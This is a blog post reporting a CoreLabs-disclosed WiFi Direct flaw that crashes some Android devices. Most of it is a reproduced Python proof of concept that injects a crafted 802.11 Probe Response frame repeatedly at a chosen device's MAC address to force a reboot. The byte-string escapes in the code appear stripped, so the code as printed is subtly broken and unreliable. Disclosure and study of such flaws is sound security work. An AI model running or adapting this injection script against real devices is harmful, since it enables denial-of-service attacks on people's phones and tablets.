Some Android Devices Vulnerable to DOS from WiFi Direct vulnerability

Share if you likedShare on Facebook0Share on Google+0Tweet about this on TwitterShare on LinkedIn0

Android Devices are vulnerable to DOS from WiFi Direct vulnerability discovered by Andres Blanco from the CoreLabs

An attacker could send a specially crafted 802.11 Probe Response frame causing the Dalvik subsystem to reboot because of an Unhandle Exception on WiFiMonitor class.

Vulnerable Packages include:

. Nexus 5 – Android 4.4.4
. Nexus 4 – Android 4.4.4
. LG D806 – Android 4.2.2
. Samsung SM-T310 – Android 4.2.2
. Motorola RAZR HD – Android 4.1.2

Coresec disclosed the vulnerability on Seclists, the bug is in the modified wpa_supplicant function which provides the interface between the wireless driver and the Android platform.

If the attacker sends a malformed wpa_supplicant value then Android’s WifiP2pDevice class throws an IllegalArgumentException, crashing the device: “a device name attribute with specific bytes generates a malformed supplicant event string that ends up throwing the IllegalArgumentException”.

Here is the POC example from seclist:

   This PoC was implemented using the open source library Lorcon
   [2] and PyLorcon2 [3], a Python wrapper for the Lorcon library.

/-----
    #!/usr/bin/env python

    import sys
    import time
    import struct
    import PyLorcon2


    def get_probe_response(source, destination, channel):
        frame = str()
        frame += "x50x00"  # Frame Control
        frame += "x00x00"  # Duration
        frame += destination
        frame += source
        frame += source
        frame += "x00x00"  # Sequence Control
        frame += "x00x00x00x00x00x00x00x00"  # Timestamp
        frame += "x64x00"  # Beacon Interval
        frame += "x30x04"  # Capabilities Information

        # SSID IE
        frame += "x00"
        frame += "x07"
        frame += "DIRECT-"

        # Supported Rates
        frame += "x01"
        frame += "x08"
        frame += "x8Cx12x98x24xB0x48x60x6C"

        # DS Parameter Set
        frame += "x03"
        frame += "x01"
        frame += struct.pack("B", channel)

        # P2P
        frame += "xDD"
        frame += "x27"
        frame += "x50x6Fx9A"
        frame += "x09"
        # P2P Capabilities
        frame += "x02" # ID
        frame += "x02x00" # Length
        frame += "x21x00"
        # P2P Device Info
        frame += "x0D" # ID
        frame += "x1Bx00" # Length
        frame += source
        frame += "x01x88"
        frame += "x00x0Ax00x50xF2x04x00x05"
        frame += "x00"
        frame += "x10x11"
        frame += "x00x06"
        frame += "fafaxFAxFA"

        return frame


    def str_to_mac(address):
        return "".join(map(lambda i: chr(int(i, 16)), address.split(":")))


    if __name__ == "__main__":
        if len(sys.argv) != 3:
            print "Usage:"
            print "  poc.py  "
            print "Example:"
            print "  poc.py wlan0 00:11:22:33:44:55"
            sys.exit(-1)

        iface = sys.argv[1]
        destination = str_to_mac(sys.argv[2])

        context = PyLorcon2.Context(iface)
        context.open_injmon()

        channel = 1
        source = str_to_mac("00:11:22:33:44:55")
        frame = get_probe_response(source, destination, channel)

        print "Injecting PoC."
        for i in range(100):
            context.send_bytes(frame)
            time.sleep(0.100)
-----/
Share if you likedShare on Facebook0Share on Google+0Tweet about this on TwitterShare on LinkedIn0

Leave a Reply